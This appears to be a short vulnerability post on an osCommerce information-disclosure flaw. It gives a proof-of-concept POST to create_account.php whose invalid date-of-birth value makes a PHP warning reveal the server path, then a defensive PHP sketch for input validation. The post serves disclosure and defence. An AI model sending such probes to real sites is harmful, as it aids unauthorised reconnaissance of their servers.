osCommerce 'create_account.php' Information Disclosure Vulnerability

Once again, an information disclosure vulnerability has reportedly been found in osCommerce.

osCommerce is prone to an information-disclosure vulnerability because it fails to sanitize user-supplied input.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

http://www.securityfocus.com/bid/31209/discuss

It probably only exposes the directory path, I guess...

POST /oscommerce/create_account.php

action=process&gender=m&firstname=john&lastname=smith&dob=FOOBAR&email_address=email@address.com&company=foobar&street_address=foobar&suburb=foobar&postcode=foobar&city=foobar&state=foobar&country=1&telephone1=123456789&fax=123456789&newsletter=on&password=foobar&confirmation=foobar

Result:

Warning: checkdate() expects parameter 3 to be long, string given in /var/www/oscommerce/create_account.php on line 80

http://www.securityfocus.com/archive/1/496417
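
A defensive sketch of the fix this report implies, as an added example that is not osCommerce's own code: validate the dob field and cast its parts to integers before they reach checkdate(), and keep PHP diagnostics out of the response. The helper name parse_dob() and the MM/DD/YYYY input format are assumptions; the page does not show the code at line 80 or the expected date format.

```php
<?php
// Added example, not osCommerce code.
// Assumption: dob is submitted as MM/DD/YYYY (the page does not state the format).

/**
 * Hypothetical helper: parse a date-of-birth string into [month, day, year]
 * integers, or return null if it is not a real calendar date.
 */
function parse_dob(string $dob): ?array
{
    // Reject anything that is not digits and slashes in the expected shape,
    // so a value like "FOOBAR" never reaches checkdate().
    if (!preg_match('#^(\d{1,2})/(\d{1,2})/(\d{4})$#', trim($dob), $m)) {
        return null;
    }
    [$month, $day, $year] = [(int) $m[1], (int) $m[2], (int) $m[3]];

    // checkdate() now always receives integers, so the type warning
    // (and the file path it prints) cannot be triggered by user input.
    return checkdate($month, $day, $year) ? [$month, $day, $year] : null;
}

// Defence in depth: send PHP warnings to the log, not to the HTTP response.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Constructed sample inputs, including the dob value from the report above.
foreach (['FOOBAR', '02/30/1980', '05/21/1970', ''] as $input) {
    $parsed = parse_dob($input);
    printf(
        "%-12s => %s\n",
        var_export($input, true),
        $parsed === null ? 'rejected' : vsprintf('%02d/%02d/%04d', $parsed)
    );
}
```

In production the display_errors setting belongs in php.ini or the virtual host configuration, so that it also covers errors raised before any script code runs.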
